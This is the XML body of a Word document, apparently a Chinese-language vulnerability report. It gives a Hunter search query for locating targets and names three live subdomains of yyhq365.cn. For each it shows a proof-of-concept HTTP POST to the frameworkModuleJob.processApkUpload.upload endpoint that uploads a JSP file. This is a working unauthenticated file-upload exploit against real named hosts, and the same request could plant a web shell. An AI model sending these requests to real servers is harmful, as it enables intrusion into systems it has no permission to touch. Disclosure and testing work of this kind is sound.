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Hunter：web.body="frameworkModuleJob"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39522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"http://fxry.yyhq365.cn/loginController.do?login"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6"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>http://fxry.yyhq365.cn/loginController.do?login</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273040" cy="2642870"/>
            <wp:effectExtent l="0" t="0" r="1016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POST /ajaxinvoke/frameworkModuleJob.processApkUpload.upload HTTP/1.1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Host: fxry.yyhq365.cn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User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.0.0 Safari/537.36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Accept-Encoding: gzip, deflate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Accept: */*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Connection: close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Content-Length: 227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------WebKitFormBoundaryN5Novghl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Content-Disposition: form-data; name="Filedata"; filename="test.jsp"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Content-Type: application/octet-stream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&amp;lt;% out.println("Hello World！");%&amp;gt;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------WebKitFormBoundaryN5Novghl--</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273040" cy="2642870"/>
            <wp:effectExtent l="0" t="0" r="1016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资产二：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"http://cybb.yyhq365.cn/"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6"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>http://cybb.yyhq365.cn/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3515" cy="2651760"/>
            <wp:effectExtent l="0" t="0" r="698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POST /ajaxinvoke/frameworkModuleJob.processApkUpload.upload HTTP/1.1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Host: cybb.yyhq365.cn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User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.0.0 Safari/537.36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Accept-Encoding: gzip, deflate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Accept: */*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Connection: close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Content-Length: 224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------WebKitFormBoundaryN5Novghl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Content-Disposition: form-data; name="Filedata"; filename="test.jsp"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Content-Type: application/octet-stream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;% out.println("Hello World！");%&amp;gt;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------WebKitFormBoundaryN5Novghl--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3040" cy="3363595"/>
            <wp:effectExtent l="0" t="0" r="1016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</w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>资产三：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts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fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts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instrText xml:space="preserve"> HYPERLINK "http://bjdt.yyhq365.cn/" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts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fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="Segoe UI" w:cs="Segoe UI"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>http://bjdt.yyhq365.cn/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts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fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273040" cy="2981325"/>
            <wp:effectExtent l="0" t="0" r="1016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poc：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POST /ajaxinvoke/frameworkModuleJob.processApkUpload.upload HTTP/1.1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Host: bjdt.yyhq365.cn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User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.0.0 Safari/537.36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Accept-Encoding: gzip, deflate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Accept: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/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/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Connection: close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Content-Length: 227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------WebKitFormBoundaryN5Novghl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Content-Disposition: form-data; name="Filedata"; filename="test.jsp"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Content-Type: application/octet-stream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&amp;lt;% out.println("Hello World！");%&amp;gt;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------WebKitFormBoundaryN5Novghl--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694305"/>
            <wp:effectExtent l="0" t="0" r="952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iYmU0YTg3NDNmZjE2MWZjMzZkODA0ODE3NTQ2YTIifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00000000"/>
    <w:rsid w:val="0AAE3412"/>
    <w:rsid w:val="31513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2024-03-16T15:49:43Z</dcterms:created>
  <dc:creator>86132</dc:creator>
  <cp:lastModifiedBy>㉨</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-03-16T15:57:58Z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F44E015243E249E0B87B8551C44B67D3_12</vt:lpwstr>
  </property>
</Properties>
</file>